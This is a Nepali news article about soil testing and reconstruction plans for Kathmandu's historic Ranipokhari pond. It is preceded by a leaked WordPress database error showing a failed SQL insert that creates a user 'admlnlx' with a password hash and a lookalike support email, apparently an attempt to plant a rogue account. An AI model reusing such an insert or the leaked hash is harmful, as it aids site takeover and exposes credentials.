WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXZftdwt3zWTT/SZMZD9/bDGsU4DBA.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:58:18', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २५–
रानीपोखरीको माटो परीक्षण गरिएपछि मात्र सफा गर्ने काम सुरु गरिने भएको छ ।
रानीपोखरीको पुनःनिर्माणको जिम्मा पाएको वल्र्डवाइड कँडेल केएन केजी जेभीका निर्देशक अर्जुन कँडेलका अनुसार खानी तथा भूगर्भ विभागले माटो परीक्षण गर्नेछ । पोखरीमा रहेको माटाले पानी कत्तिको सोस्छ भन्ने जाँच गर्न विभागले यसै साता माटो परीक्षण गर्न लागेको छ ।
गत पुसको पहिलो सातामा नै पोखरीमा रहेका सबै माछा अन्यत्र सारी पोखरी सफा गर्ने तयारी भए पनि माटो परीक्षणमा ढिलाइ भएको कामपाले जनाएको छ छ । पोखरीका वरपर अन्य निर्माण भइरहेको छ ।
दुई वर्ष लगाएर विसं १७२७ मा बनाइएको पोखरी प्रताप मल्लका कान्छा छोरा चक्रवर्तीन्द्रको मृत्युपछि रानीलाई शोकबाट मुक्त गराउन निर्माण गराएको इतिहासमा उल्लेख छ । विसं २०७२ वैशाख १२ को भूकम्पका कारण पोखरीको बीच भागमा रहेको बालगोपालेश्वर मन्दिर, पोखरी र वरपरसमेतमा क्षति पुगेको थियो । चार सय वर्षदेखि सफा नगरिएको उक्त पोखरी निर्माणकै अवसर पारी सफा गर्न लागिएको हो ।
धेरै नदी, कुण्ड र तीर्थस्थलका जलले भरिएको ऐतिहासिक महत्व बोकेको विष्णुतीर्थको पुनःनिर्माणको मौका छोपी पोखरीलाई पर्यटकीय गन्तव्यका रूपमा विकास गरिने भएको छ ।